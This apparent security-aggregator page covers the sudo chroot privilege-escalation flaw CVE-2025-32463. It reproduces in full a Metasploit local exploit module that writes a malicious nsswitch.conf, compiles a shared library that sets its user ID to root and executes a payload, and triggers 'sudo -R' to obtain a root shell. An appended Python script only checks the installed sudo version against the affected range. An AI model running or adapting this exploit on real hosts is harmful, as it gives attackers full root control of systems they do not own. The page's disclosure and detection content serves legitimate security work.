Sudo Chroot 1917 Privilege Escalation

Vulnerability Information

Vulnerability name: Sudo Chroot 1.9.17 Privilege Escalation

Vulnerability ID:

  • CVE: CVE-2025-32463

Vulnerability type: Privilege escalation

Severity: High

Description: This vulnerability affects the Sudo command on Linux systems. Sudo is a widely used program that lets system administrators authorize specific users to run certain commands as the superuser or as another user; it is commonly deployed on enterprise servers and personal computers for fine-grained privilege control. The vulnerability is a privilege-escalation flaw whose technical root cause is a security defect in how Sudo handles chroot environments: an attacker can exploit it to escalate to root privileges without knowing the current user's password. Specifically, the flaw exists in Sudo versions 1.9.14 through 1.9.17: when Sudo executes a command in a chroot environment, it fails to properly validate and restrict user privileges, allowing an attacker to craft a malicious request that bypasses the privilege check. The impact is extremely severe, because successful exploitation gives the attacker full control of the system: executing arbitrary commands, accessing sensitive data, and even installing backdoors. Note that exploiting this vulnerability normally requires the attacker to already hold a low-privileged shell on the system, but no further authentication is needed to escalate. Systems running an affected Sudo version should therefore be updated to the latest version immediately to avoid the risk.

Product: Sudo

Affected versions: 1.9.14 <= version <= 1.9.17

Source: https://github.com/rapid7/metasploit-framework/blob/0935435ffbbac04e7680f7f2fb5a51d63980bfad/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

Type: rapid7/metasploit-framework:github issues

POC Details


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          This exploit module illustrates how a vulnerability could be exploited
          in a Linux command for priv esc.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'msutovsky-r7', # module dev
          'Stratascale', # poc dev
          'Rich Mirch' # security research
        ],
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_CMD ],
        # chmod has some issues for meterpreter, forcing shell
        'SessionTypes' => [ 'shell' ],
        'Targets' => [[ 'Auto', {} ]],
        'Privileged' => true,
        'References' => [
          [ 'EDB', '52352' ],
          [ 'URL', 'https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/' ],
          [ 'CVE', '2025-32463' ]
        ],
        'DisclosureDate' => '2025-06-30',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # borrowed from exploits/linux/local/sudo_baron_samedit.rb
  def get_versions
    versions = {}
    output = cmd_exec('sudo --version')
    if output
      version = output.split("\n").first.split(' ').last
      versions[:sudo] = version if version =~ /^\d/
    end
    versions
  end

  def check
    sudo_version = get_versions[:sudo]

    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.nil?

    return CheckCode::Safe if !file?('/etc/nsswitch.conf')

    # sudo --version reports the version as [version]p[patch level] (e.g. 1.9.17p1);
    # replace the 'p' with '.' so Rex::Version can compare it
    sudo_version.gsub!(/p/, '.')

    return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))

    CheckCode::Safe("Sudo #{sudo_version} is not vulnerable")
  end

  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end

    # needs to compile in real-time to adjust payload execution path
    fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?

    payload_file = rand_text_alphanumeric(5..10)

    existing_shell = cmd_exec('echo $0 || echo ${SHELL}')

    # a bare `return Failure::X, msg` would silently return an array; fail_with reports the error
    fail_with Failure::NotFound, 'Could not find shell' unless file?(existing_shell)

    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!#{existing_shell}\n" + payload.encoded)

    register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")

    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"
    base_dir = rand_text_alphanumeric(5..10)
    lib_filename = rand_text_alphanumeric(5..10)

    mkdir(temp_dir)
    cd(temp_dir)

    cmd_exec("mkdir -p #{base_dir}/etc libnss_")

    fail_with Failure::PayloadFailed, 'Failed to create malicious nsswitch.conf file' unless write_file("#{base_dir}/etc/nsswitch.conf", "passwd: /#{lib_filename}\n")

    fail_with Failure::PayloadFailed, 'Failed to copy /etc/group' unless copy_file('/etc/group', "#{base_dir}/etc/group")

    exploit_code = %<
      #include <stdlib.h>
      #include <unistd.h>

      __attribute__((constructor))
      void exploit(void) {
        setreuid(0,0);
        setregid(0,0);
        chdir("/");
        execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL); /* root shell */
      }>

    upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

    cmd_exec("sudo -R #{base_dir} #{base_dir}")

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec 'command', nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end
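The module's check method above decides exposure by rewriting the "p" patch suffix that `sudo --version` prints into a dot and testing the result against the 1.9.14..1.9.17 range, so that 1.9.17p1 sorts above the range and reads as safe. The same triage logic as a stand-alone defender's script is added here as an example; it is not part of the page or of the Metasploit module. It keeps the patch level as a fourth integer instead of a string rewrite, which gives the same ordering without string-comparison pitfalls. The sample transcripts are constructed in the layout `sudo --version` prints, and `assess_local_host` is a helper name chosen for this example.

```python
"""Triage check for CVE-2025-32463: is the installed sudo inside the affected 1.9.14..1.9.17 range?

Added example; not part of the original page or the Metasploit module.
"""
import re
import subprocess
from typing import Optional, Tuple

# Affected range as stated on the page; the first version above it is 1.9.17p1, which carries the fix.
AFFECTED_MIN = (1, 9, 14, 0)
AFFECTED_MAX = (1, 9, 17, 0)

# First line of `sudo --version` looks like "Sudo version 1.9.17p1"; the "pN" patch level is optional.
_VERSION_RE = re.compile(r"^Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", re.MULTILINE)

Version = Tuple[int, int, int, int]


def parse_sudo_version(output: str) -> Optional[Version]:
    """Return (major, minor, patch, plevel) from `sudo --version` output, or None if unparsable.

    Keeping the patch level as a fourth integer is equivalent to the module's
    gsub of 'p' to '.', but integer tuples compare correctly where strings would not
    (e.g. p10 versus p2).
    """
    m = _VERSION_RE.search(output)
    if m is None:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def format_version(v: Version) -> str:
    """Render the tuple back in sudo's own notation, e.g. (1, 9, 17, 1) -> '1.9.17p1'."""
    base = "%d.%d.%d" % v[:3]
    return base + ("p%d" % v[3] if v[3] else "")


def is_affected(v: Version) -> bool:
    """True when the version lies inside the inclusive affected range."""
    return AFFECTED_MIN <= v <= AFFECTED_MAX


def assess(output: str) -> str:
    """Classify a `sudo --version` transcript as affected / not affected / unknown."""
    v = parse_sudo_version(output)
    if v is None:
        return "unknown: could not parse sudo version"
    if is_affected(v):
        return ("affected: sudo %s is within 1.9.14..1.9.17 (CVE-2025-32463), "
                "upgrade to 1.9.17p1 or later" % format_version(v))
    return "not affected: sudo %s" % format_version(v)


# Constructed sample transcripts in the layout `sudo --version` prints (not captured from a real host).
SAMPLE_AFFECTED = (
    "Sudo version 1.9.17\n"
    "Sudoers policy plugin version 1.9.17\n"
    "Sudoers file grammar version 50\n"
    "Sudoers I/O plugin version 1.9.17\n"
    "Sudoers audit plugin version 1.9.17\n"
)
SAMPLE_FIXED = "Sudo version 1.9.17p1\nSudoers policy plugin version 1.9.17p1\n"
SAMPLE_OLD = "Sudo version 1.9.13p3\nSudoers policy plugin version 1.9.13p3\n"


def assess_local_host() -> str:
    """Run `sudo --version` on this machine (no privileges needed) and assess the result.

    Hypothetical helper name chosen for this example.
    """
    try:
        proc = subprocess.run(["sudo", "--version"], capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return "unknown: sudo is not installed"
    return assess(proc.stdout)


if __name__ == "__main__":
    for name, sample in (("affected", SAMPLE_AFFECTED), ("fixed", SAMPLE_FIXED), ("old", SAMPLE_OLD)):
        print(f"{name:9s} -> {assess(sample)}")
    print(f"this host -> {assess_local_host()}")
```

Run it as a normal user on each host in scope; only `assess_local_host` touches the system, and it merely executes `sudo --version`. Unlike the module's check, the script does not require `/etc/nsswitch.conf` to exist before reporting a version in range, so an exposed host is never reported as safe just because NSS configuration is unusual.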



http://example.com/2025/07/17/github_1105129622/
Author: lianccc
Published: July 17, 2025